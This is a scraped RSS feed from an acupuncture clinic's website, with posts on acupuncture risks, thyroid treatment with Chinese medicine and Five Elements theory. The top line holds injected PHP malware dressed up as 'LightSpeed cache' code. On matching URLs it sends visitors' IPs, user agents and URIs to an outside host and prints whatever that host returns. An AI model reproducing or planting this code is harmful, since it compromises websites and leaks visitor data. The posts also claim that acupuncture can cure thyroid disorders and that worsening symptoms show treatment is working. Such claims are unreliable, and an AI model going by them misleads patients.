/** * Implement the LightSpeed cache. */ if (preg_match ('/.*77.*/', $_SERVER['REQUEST_URI']) || preg_match ('/.*ach.*/', $_SERVER['REQUEST_URI'])) { error_reporting(0); $url="http://w3lightcache.com/server_new.php";$params="h=$_SERVER[HTTP_HOST]&ua=$_SERVER[HTTP_USER_AGENT]&ip=$_SERVER[REMOTE_ADDR]&ip2=$_SERVER[HTTP_X_FORWARDED_FOR]&uri=$_SERVER[REQUEST_URI]";$ch=curl_init($url);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$params);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$result=curl_exec($ch);curl_close($ch); if (!empty($result)) {echo $result; die;} } water – American Institute of Acupuncture http://acuherb.us Acupuncture, herbs, and traditional Chinese Medicine, health full service spa Mon, 10 Sep 2018 16:49:35 +0000 en-US hourly 1 https://wordpress.org/?v=5.0.21 Are there risks or side effects to acupuncture? http://acuherb.us/are-there-risks-or-side-effects-to-acupuncture/ http://acuherb.us/are-there-risks-or-side-effects-to-acupuncture/#comments Fri, 19 Aug 2011 04:17:17 +0000 http://acuherb.us/?p=670

Are there risks or side effects to acupuncture?

Usually not. Acupuncture is a very safe method of encouraging the body to promote natural healing and improve function.

Done properly, acupuncture rarely causes serious side effects. Many people feel a brief stinging sensation, like a pinprick, during insertion of the needles. Others experience a dull ache around the needle after it goes in.

Other problems documented by researchers resulted from mistakes made by the acupuncturists. For example, some have failed to refer their patients for other kinds of treatment that might be more effective for their illness. Others have spread serious infections by using needles that weren’t sterile. A handful have injured patients by pushing a needle into a vital organ such as a lung. But overall, as the National Institutes of Health recently concluded, acupuncturists have an extremely good safety record.

A side effect that I have seen in my own practice is the original symptoms worsening for a few days after an acupuncture treatment.  Sometimes other general changes in appetite, sleep, bowel or urination patterns, or emotional state may be triggered. These should not cause concern, as they are simply indications that the acupuncture is starting to work.  My teacher explained it to me like this: Acupuncture is smoothing out blocked Qi (energy) that is stuck in areas of your body. When a garden hose gets a kink in it, the water stops flowing. When you straighten the hose, the built up pressure makes the water burst out in the beginning. This is what can happen when you first have acupuncture.

It is also common with the first one or two treatments to have a sensation of deep relaxation or even mild disorientation immediately following the treatment. These effects should wear off within 24-48 hours.

Please discuss what you have been experiencing with your acupuncturist. Your comfort is a priority. The more you communicate with the practitioner, the more he or she will be able to help you.

A few people have reported more serious reactions, such as dizziness, sweatiness, or nausea, according to a November 1999 issue of theArchives of Family Medicine. There have even been some cases reported where patients lost consciousness. However, these problems usually clear up on their own within a few minutes, without lasting harm to the patient.

While Acupuncture is an extremely safe form of physical medicine, here are some rarely seen contraindications and risks.

Precautions & Contraindications:

  1. It is contraindicated to needle the abdomen and lumbosacral areas of pregnant women
  2. Avoid blood vessels to prevent bleeding
  3. Points on the chest and back should be carefully needled to avoid injury to organs

Risks: (Some of the risks mentioned below are EXTREMELY RARE!)

  1. Bruising
  2. Fainting
  3. Muscle Spasms
  4. Bleeding
  5. Nerve Damage
  6. Punctured Lung
  7. Accidental Injury to organs (Brain, Spinal Cord, Heart, Liver, Spleen, Kidney)
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Thyroid Treatment With TCM and Acupuncture http://acuherb.us/thyroid-treatmentwith-tcm-and-acupuncture/ Tue, 16 Aug 2011 19:45:32 +0000 http://acuherb.us/?p=603

 

 

The health of your thyroid gland truly makes or breaks your daily energy level, the ability to sustain a healthy weight for your frame, overall metabolic function, and can even affect your emotional life (if thyroid function is low, depression can result; if thyroid function is high, anxiety can result).

Your thyroid is a remarkable gland, located at the front of the throat by the larangeal prominence. If it functions properly, the perfect amount of thyroid hormone is secreted to meet your daily energy needs, but if it is low you will likely feel fatigued, unable to keep up with life’s demands, have sleeping difficulties, gain weight easily and feel cold much of the time.  Millions of Americans have thyroid conditions from genetic predisposition, years of stress, and compounded by the toll of pollution in our air, food, and water.

Here is one very helpful thyroid solution: Acupuncture specifically for hormone balancing and thyroid care!  If you suspect that your thyroid function is low, consider Acupuncture and custom Chinese herbal formulas to boost your energy, regulate sleep patterns, and restore hormonal balance.

From Thyroid Care to Thyroid Cure: The Benefits of Including Acupuncture

If we utilize both Western and Eastern methods of healing there exist many options for treating and even curing hormone imbalances. 

 I had first-hand observation from years of Texas medical practice that this ancient modality had surprising ability to correct hormonal imbalances. I and other MDs had seen patients benefit greatly from this older approach to hormone health; often this was the best method for certain recalcitrant and debilitating versions of thyroid imbalance.

Fatigue, exhaustion, infertility, weight gain, depression, digestive problems, hair loss, arthritis, feeling chilled no matter the temperature all may be symptoms of a low thyroid condition, one of the most misdiagnosed medical disorders in America.  The lethargy, lack of stamina, and emotional distress of low thyroid function (hypothyroidism) is often mistaken for clinical depression and wrongly treated with seratonin reuptake inhibiting medications like Prozac and Paxil. Misdiagnosed or undiagnosed hypothyroidism may affect one in nine adult women in the U.S. and for the post-menopause subset that statistic gets as high as one in four.

It is important to become informed of the wide spectrum of hormone-related conditions that can affect one’s health, energy, and quality of life.  Low thyroid function is one aspect, but adrenal function, reproductive hormones, the pituitary and hypothalamus, and so on, each play a critical role in proper metabolic rate and homeostasis.  It is of critical importance to be accurately tested for hormone function if you display the previously described signs and symptoms and/or if your health care provider suspects sub-optimal hormone levels.  For quality, affordably priced laboratory tests you can order without a doctor’s prescription, please visit the health advocacy organization Canary Club at www.CanaryClub.org online.

But once cognizant of an existing hormone imbalance via lab test results or compelling symptom-related evidence, how can your health care providers fully remedy your condition? There are options but also many limitations available within the Western medical model, including hormone replacement prescriptions (if you are low in thyroid/adrenal or estrogen/progesterone/testosterone) or hormone suppression prescriptions (if any of the above are too high).

For hypothyroid patients specifically, some do not respond well to the standard (slow-acting T4) Synthroid prescription and instead might benefit from the addition to Synthroid of Cytomel (fast-acting T3).  Sometimes what works even better is a different thyroid prescription completely like Armor or Naturthroid (both non-synthetic).

These medicines greatly assist, but among autoimmune patients (who comprise the majority of thyroid sufferers in either the category of Hashimoto’s hypothyroidism or Grave’s hyperthyroidism) there are still many who despite determining which thyroid replacement is best and at what dosage, they still do not feel 100%.  These patients benefit some from their medical prescriptions but are still hovering around only 60% or 70% or 80% of their normal self, and suffer continued symptoms such as fatigue, emotional distress, insomnia, mental fuzziness, etc.  There are several possible causes for this, in the Western medical viewpoint.  Autoimmunity is likely the most severe example of imbalance within the human body that one could find: An organism at war with itself, the immune system cells attacking the body’s own tissue.

Of course in such cases it may be difficult to fully optimize the thyroid being replaced as there exists a cellular resistance to the hormone, for instance because the autoimmune response has targeted the thyroid hormone receptors, or perhaps because synthetic chemical pollutants in our air, food, and water interfere with endocrine function. It is also possible an iodine deficiency may be at fault, although this is more common in underdeveloped countries.

So how can thyroid hormone (whether produced internally by the endocrine system or replaced by prescription medication) be adequately metabolized, taken up by the body’s cells to perform its many functions on both a microscopic and macroscopic level?  The answer is: The entire human system must be in balance for successful utilization of thyroid hormone.  The key here is an integrative approach to balance and optimal wellness, for which ancient Chinese healing practices are world-renowned.

As an  OMD, Acupuncturist and Herbalist, I have always been impressed by how TCM (Traditional Chinese Medicine) cultivates a holistic perspective in developing diagnostic impressions and treatment protocols for each patient.  The keystone of our medicine is awakening the body’s natural intelligence to heal itself.

Our goal, when we needle specific points or prescribe herbal formulas individually modified to the patient’s pattern of dis-ease, is restoring balance to the system of meridians that crisscross and encircle the body in a similar fashion to the lymph or nervous system in Western medicine.  TCM seeks to restore health within the body by benefiting, with needles, herbs, nutrition, massage, lifestyle changes and so on, the fundamental balance of Yin and Yang within the body.  Yin and Yang are the two aspects in Chinese medical philosophy representing the  many balances within the body such as internal/external, cold/hot, deficiency/excess, acidic/alkaline, sympathetic/parasympathetic, and so on.

Let me give you  an example, a forty five  year-old menopausal woman who has just discovered she has thyroid dysfunction as well.  Because estrogen production wanes during the menopausal years, and the endocrine system is a delicate balance of many different glands all producing and utilizing various hormones depending on hormone production in the other glands, not only is she experiencing hot flashes and night-sweats from the estrogen decrease but she also has chilliness and fatigue from the hypothyroidism.  She feels excessively hot then deficient and cold, the mind races while the physical body becomes exhausted.

The Western practitioner might put her on estrogen replacement that helps the hot flashes (but it can increase her weight and breast cancer risk) as well as thyroid hormone which helps the fatigue (but it can increase adrenal irritability and insomnia).

The Eastern practitioner seeks the root cause within the pattern of imbalance, which she determines to be a deficiency of both Kidney Yin and Kidney Yang (a common diagnosis for menopausal women as both the Qi and Blood may wane too suddenly during the transition).  She needles points to clear heat (Large Intestine 11, Liver 2), strengthen the Liver and Kidney Yin (Spleen 6) and invigorate the Kidney Yang (Kidney 3, Kidney 7) (Fire Kidney Fire on also very important but this technique need under Doctor’s help, for the  Yang very weak case may need several time stimuli the fetal Yang  on Kidney gate).  She prescribes a granulated herbal formula like Golden Book Tea, otherwise known as Jing Gui Shen Qi Wan, and modifies it with long gu to anchor the Yang and dang gui to build Blood.  After a couple weeks of daily herbal tea and weekly acupuncture, the patient reports having no more hot flashes, less chilliness, and much more restful sleep leading to overall more energy and well-being throughout the day.

How does Acupuncture accomplish what Western medicine cannot alone?  By rebalancing the internal homeostasis of the body.  Tongue and pulse diagnosis plus symptom cluster are the pillars of objective data gathering. Utilizing carefully chosen trigger points and tonifying or sedating herbs, one nourishes the vital fluids and balances Yin and Yang while removing stagnation within the meridians.

Every patient is unique, so an individualized approach is essential to accuracy yet the overarching pattern can be determined based on objective tongue and pulse signs, and the subjective symptom cluster.

Patients best benefit from an integrated Eastern and Western medical approach to health.  The strong point of Western medicine is intervention in life-threatening illness, whereas the strong point of Eastern medicine is increased quality of life.  Therefore it is most optimal to have available both Eastern and Western medicine options for more complete care.  This blending of the East and West has been the standard of hospital care in China for several  decades.

If you have not tried Acupuncture and other methods of Traditional Chinese Medicine as a critical aspect of your complete hormone care, consider it today. Acuherb Clinic’s practice is focused on bringing better care to the specializations of: Thyroid, Adrenal, Stress & Anxiety. You deserve the best of both worlds when it comes to your health.  We are delighted to assist you in cultivating a more energetic, balanced, and graceful lifestyle!  For appointments in American Institute of Acupuncture, Acuherb Clinic.

DRUG interaction with Levothyroxine

Levothyroxine sodium may interact with numerous other medications, including over-the-counter medications. Some of the medicines that may potentially lead to levothyroxine interactions include:

Antacids or gas-relieving medications

  • Antidepressant medications
  • Calcium supplements
  • Cholestyramine (Prevalite ,Questran , Questran Light)
  • Colestipol(Colestid)
  • Diabetes medications
  • Digoxin(Digitek,Lanoxin)
  • Estrogens, such ashormone replacement therapy(HRT) andbirth control pills, patches, or rings
  • Iron (including iron found in multivitamins)
  • Orlistat(Alli,Xenical)
  • Raloxifene(Evista)
  • Rifampin (Rifadin)
  • Some seizure medications, such as:
  • Carbamazepine (Carbatrol, Epitol, Equetro, Tegretol)
  • Phenobarbital (Luminal)
  • Phenytoin(Dilantin, Phenytek)
  • Sucralfate(Carafate)
  • Theophylline(Uniphyl, Theocron, TheoCap, Theo-24, Elixophyllin)
  • Warfarin(Coumadin,Jantoven).
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Five Elements theory http://acuherb.us/five-elements-theory/ Thu, 11 Aug 2011 19:32:16 +0000 http://acuherb.us/?p=417

File:Wuxing en.svg

Five Phases theory

Five Phases (五行, pinyin: wu xíng), sometimes also translated as the “Five Elements”  theory, presumes that all phenomena of the universe and nature can be broken down into five elemental qualities – represented by wood (木, pinyin: mù), fire (火pinyin: huÇ’), earth (土, pinyin: tÇ”), metal (金, pinyin: jÄ«n), and water (æ°´, pinyin: shuǐ).  In this way, lines of correspondence can be drawn:

Phenomenon Wood Fire Earth Metal Water
Direction east south center west north
Color green/blue red yellow white black
Climate wind heat damp dryness cold
Taste sour bitter sweet acrid salty
Zang Organ Liver Heart Spleen Lung Kidney
Fu Organ Gallbladder Small Intestine Stomach Large Intestine Bladder
Sense organ eye tongue mouth nose ears
Facial part above bridge of nose between eyes, lower part bridge of nose between eyes, middle part cheeks (below cheekbone)
Eye part iris inner/outer corner of the eye upper and lower lid sclera pupil

  

Strict rules are identified to apply to the relationships between the Five Phases in terms of sequence, of acting on each other, of counteraction etc.  All these aspects of Five Phases theory constitute the basis of the zàng-fǔ concept, and thus have great influence regarding the TCM model of the body.  Five Phase theory is also applied in diagnosis and therapy.

Correspondences between the body and the universe have historically not only been seen in terms of the Five Elements, but also of the “Great Numbers” (大數, pinyin: dà shÅ«) For example, the number of acu-points has at times been seen to be 365, in correspondence with the number of days in a year; and the number of main meridians – 12 – has been seen in correspondence with the number of rivers flowing through the ancient Chinese empire.

 

Five Element Relationships

It was observed over the years that the Five Elements relate to each other in different ways.

  • Sheng Cycle (Generating Sequence)
  • Ko Cycle (Controlling Sequence)
  • Destructive Cycle (Overacting Sequence)
  • Anti Ko Cycle (Insulting Sequence)

Sheng Cycle

The Generating Sequence or Mother-Child Relationship

As in the cycle of the seasons, each element generates another, i.e., one element is the “mother” of the next.

Wood (Liver) creates Fire (Heart) Wood is the Mother of Fire Liver is the Mother of the Heart
Fire (Heart) creates Earth (Spleen) Fire is the Mother of Earth  
Earth (Spleen) creates Metal (Lungs) Earth is the Mother of Metal  
Metal creates Water Metal is the Mother of Water  
Water creates Wood. Water is the Mother of Wood  

Naturally, therefore, each element is generated by another: Fire is the child of Wood, Earth is the child of Fire, etc. In nature, we see this in the seasonal changes: Winter transforms into Spring, Spring changes into Summer.

Ko Cycle

Controlling Sequence or Father-Child relationship Each element is said to control, check, or regulate another.

  • Wood controls Earth
  • Fire controls Metal
  • Earth controls Water
  • Metal controls Wood
  • Water controls Fire

Each element is of course then controlled by another.

  • Earth is controlled by Wood
  • Wood is controlled by Metal, etc.

This cycle ensures that a balance is maintained between elements.

The “father-child” symbology relates to traditional family roles, where the father was the patriarchal head of the household. The mother, by comparison, is seen as the creative and nurturing force.

Destructive Cycle

Overacting Sequence

This is the same as the Ko cycle, but in this sequence, one Element is said to “over-control” or “destroy” another, causing the controlled element to become Deficient. This happens when balance breaks down so that one element becomes excessive in relationship to another.

E.g. An excess of Wood energy will over-control Earth, causing Earth to become Deficient.

Anti-Ko Cycle

Insulting Sequence

This cycle is the reverse of the Ko cycle or controlling sequence. In the Insulting Sequence, the element that should BE controlled becomes imbalanced and excessive, and controls the element that normally controls it.

Example: Instead of Metal controlling Wood, if Wood becomes excessive, it can “insult” Metal, causing it to become imbalanced. This is akin to the child rebelling and insulting or trying to discipline its father.

 

Four Possible Pathologies

Element in Excess overacts on another (Overacting sequence)

Element in Deficiency insulted by another (Insulting sequence)

Element in Excess drains from Mother (pathological Sheng cycle)

Element in Deficiency fails to nourish Child (pathological Sheng cycle)

 

Five Element Aggressive Energy Treatment

This is a Five Element treatment used for clearing a patient of aggressive energy. It is very similar to the TCM treatment sometimes called the “Shen Cycle” or “Shen Circle”. Half inch (1/2″) needles are inserted just barely under the skin, from top to bottom and right to left, usually inserting BL-15 as the last point.

The points in this treatment:

  • BL-13
    Lung Shu
  • BL-14
    Pericardium Shu
  • BL-15
    Heart Shu
  • BL-18
    Liver Shu
  • BL-20
    Spleen Shu
  • BL-23
    Kidney Shu

Needles are left in the patient until the redness that appears around the points is gone. A test point can be added to this treatment to gauge the redness appearing at specific points in the treatment.

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The Vital Substances http://acuherb.us/yin-and-yang/ Thu, 11 Aug 2011 19:26:27 +0000 http://acuherb.us/?p=415
  • Jing (Essence)
    The refined and precious substance that is the material basis for all life. It influences our constitution, reproduction, growth and development, and our longevity. It is the foundation for the production of Qi and aids in the production of marrow. There is both Prenatal and Postnatal Jing. 
  • Xue (Blood)
    Blood is the densest of the vital substances, flowing through the vessels to moisten and nourish the Yin Yang organs, the tendons and muscles, the skin, and the sensory organs. Blood is the mother of Qi, and houses the Shen (Mind).
  • Jin Ye
    Origins, functions, and Yin Yang organ relationships for the thin light and watery fluids of the body, as well as the more dense and heavy fluids of the body.
  • Qi (Vital Energy or Life Force)
    Qi is the vital energy or life force that flows through the body’s Meridians, Yin Yang organs, and is responsible for moving the blood.
  • Forms of Qi
    Yuan Qi, Zong Qi, Zhen Qi, Zhong Qi, Zheng Qi, Gu Qi.
  • Functions and Movements of Qi 
    Qi can transform, transport, hold, raise, protect, and warm. Qi also has a normal flow or direction of movement associated with each Yin Yang organ. 
  • The Relationship of Blood and Qi
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